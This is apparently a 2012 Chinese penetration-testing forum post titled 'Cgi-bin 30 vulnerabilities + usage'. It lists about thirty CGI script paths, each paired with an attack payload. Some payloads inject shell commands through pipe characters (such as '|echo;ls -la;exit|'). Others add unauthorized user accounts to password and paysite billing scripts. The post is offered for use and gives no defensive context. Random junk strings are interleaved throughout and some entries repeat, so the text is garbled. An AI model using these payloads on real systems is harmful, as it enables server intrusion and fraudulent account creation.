中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞+使用方法 [打印本页]
作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞+使用方法
==============================$ Y; B% n% }' W6 T! H8 {

! Z, ]  }0 O' P9 h" T. }/smspass.pl' y; I5 K; ^# G3 G. h( [
username=username&password=password
' i1 C7 o) }+ a, z' n' t* j( c# j5 K" x3 l- e* C* z
/index.cgi( `: U  b6 b8 Y5 p3 w# e
wei=ren&gen=command2 e* G6 _" U- F% l3 j1 f

" C1 v9 ^& K3 E. w- O/passmaster.cgi" m2 X9 o7 s% }/ d6 s& f" J
Action=Add&Username=Username&Password=Password
( q, f& r: f9 a# i6 p( [: P
; `7 h& B/ J/ z! I+ M! L8 a. p4 L$ v, ?- x/accountcreate.cgi0 h  \/ o/ ^" ~- r; O# i" }
username=username&password=password&ref1=|echo;ls|
0 U( \+ |* E" b5 z5 w5 d' y: y8 q: d4 ~- @; R0 `( K
/form.cgi
. m' y% {) r* G- k# ]( v9 uname=xxxx&email=email&subject=xxxx&response=|echo;ls|5 O3 e# H7 W5 c& z# m* d* z, i3 z

+ x# S1 D3 ]$ e* s5 [4 m# ~8 I/addusr.pl
- n9 D6 q, `1 e6 o6 ]* Q" Z& d! W/cgi-bin/EuroDebit/addusr.pl
! p: l0 R/ w# suser=username&pass=Password&confirm=Password
2 o. r: o/ I( P4 M: L* i" v1 a. X; ?% Q9 {/ S8 m2 ^( h. w- r
/ccbill-local.asp
# j) O8 \. w! _# j# qpost_values=username:password
5 z2 r. }% A. c# ?) x9 j6 H, ]6 l+ n0 y' O) ~
/count.cgi  \+ a+ [* G# v) g" H  {, v
pinfile=|echo;ls -la;exit|. N7 i4 V* J8 J; D6 s* o; Z6 K
, }* j* K0 t3 W& j' P$ Y( O
/recon.cgi
; q" R: T& _& j7 m' d) \/recon.cgi?search7 r3 p& M  F' p4 X* t
searchoption=1&searchfor=|echo;ls -al;exit|* o! n4 z; R: A% S
: S$ R$ T0 i" g; b3 w0 I
/verotelrum.pl
& S8 d6 ~7 X, u: V! Zvercode=username:password:dseegsow:add:amount<&30>3 p# B9 g2 f& @* t

( J& {7 F) Q6 q" c/af.cgi
( f' _' _" b+ d0 T; P2 C_browser_out=|echo;ls -la;exit;|# C. ~$ E0 J, {# v8 \( b
: q% J5 f; y. k
/modify.cgi- s/ |8 F/ _0 i' p* `
username=username&password=password&expire=303 [& L: V' F* Z* f& Z, x
9 G5 Q6 I) C! f
/openjournal.cgi4 t6 I: W+ {& O  [7 k# ~
edit=1&ct=2&go=|echo;ls -al;exit|
% }3 ^) e: e% F4 z" g$ j
1 D& ]' i( X+ H) [( b' h4 ^, a7 b/gx9passwd.cgi6 D: |1 K4 F/ k9 ]' p! r$ B
cmd=ADD&user=username&pass=password7 Z7 H+ D$ {% m9 K" @$ e, x

7 W; A- V% W# c' z! R, C9 \4 D. K/probecontrol.cgi# Y0 H" |8 W: i$ D% H
command=enable&username=username&password=password2 a! i7 V6 [" P* o9 _0 J3 C

! z+ y) @5 W* U: j/recon.cgi
* x4 T4 Z- i8 Z$ Fsearchoption=3&searchfor=echo;ls -la;exit
. H, W0 ~7 u3 F' K8 |6 I3 `0 f9 N. w
/htadd.pl& R8 V& E. L( h% n( O# E& n2 A* j+ `+ p
configfile=|echo; ls -alt; exit+ ]& w. i2 f, }5 Q% a: k: A( n9 i

% G$ X) n2 W0 j5 b' z6 P/gx9passwd.cgi0 U: b# R6 c4 Z  A2 Z$ a- ^
cmd=ADD&user=username&pass=password2 v" w2 {( T/ y0 i. r1 D# W% l. E

7 @  e2 |: ]3 m0 F4 ~# C/ibill*.pl" i; X. Q& i0 e" O+ u* B5 f2 M
reqtype=add&authpwd=authpwd&username=username&password=password( D' f) R! l0 q+ k
) R: Q# T) Y8 y9 p
/cpay.cgi3 a7 ?! P# v% v. \+ D. C/ q6 q
command=add_member&username=username(EMAIL)&password=password(DES)
/ r! F# x6 {7 U9 f* Y
7 Q7 w7 c3 V8 x( i4 |/globill_ut.cgi4 i" E8 s2 z( F7 t& p3 ?
do=add&username=username&password=password&wpassword=password
( R7 l2 o' j/ R  H7 W! m# x$ B
, L4 [% B( I" a/usercontrol.cgi' X& |( S: ~+ f% C8 b$ D
command=enable&username=USER&password=PASS- V: p2 @! |# g7 U$ g
8 G) H- Z* Z# o2 }! D+ y0 _
/globoSALErum.cgi
8 B" Y! L3 g5 k- U$ t& @% faction=ADD&seccode=seccode&login=username&password=password. E2 P( c* G$ l  ?5 a* L

" M7 L8 W# z; _$ @6 H$ g/addusr.pl
" o+ n8 l  r# i7 kuser=USER&pass=PASS&confirm=PASS- Q" t- [6 R; J) ^# b4 p* U

( F) h' Q) O3 p  L2 H, T/ {& w8 ?/pincount.cgi
# f0 h- t9 \0 y+ O! _' C/ U* H/cgi-bin/mastergate/pincount.cgi3 t' F# B8 \6 k7 e1 l
pinfile=|echo;pwd;exit|
4 a# Y' }+ h6 N" U4 p: A( f+ K  V% z' w. I
/accountcreate.cgi5 h# R+ e# D, Y6 M+ `7 r  ]  C9 Q
/cgi-bin/gateway/accountcreate.cgi, |2 t4 P" M- L$ F5 c
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
* h2 H( `: p3 O2 ]5 C
% G' o) z. ^5 Y* B/af.cgi; d" m' r$ T7 z7 [% n" H
/env.cgi. l  C5 @: X. T" F( d) H
ADD+;echo;pwd;exit% z) E$ b2 ~+ C! Z5 c% @1 l
. [' r7 V# e1 ~$ B  V
/count.cgi
0 Y% l% N8 ~1 K0 W9 d' S4 V+ j' ^pinfile=|echo;pwd;exit|
- F+ B9 q, J; k, c  T* F8 H6 r- |3 d& g9 M, V" J- o3 g8 M2 b$ Z
/recon.cgi
( g9 X; [, V: w7 b" r1 ?( c, Asearchoption=1&searchfor=|echo;ls%20-al;exit|
8 b. ~7 D0 S4 z5 {1 s3 ^5 @1 U2 P0 U( R5 C9 G
/add.cgi
8 M8 |4 B4 `( [username=username&password=password&expire=30  l; f1 ~/ i1 w2 J0 e

+ d% u6 e2 t9 j. l# G==============================$ a, x* X7 g% y' i" O




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2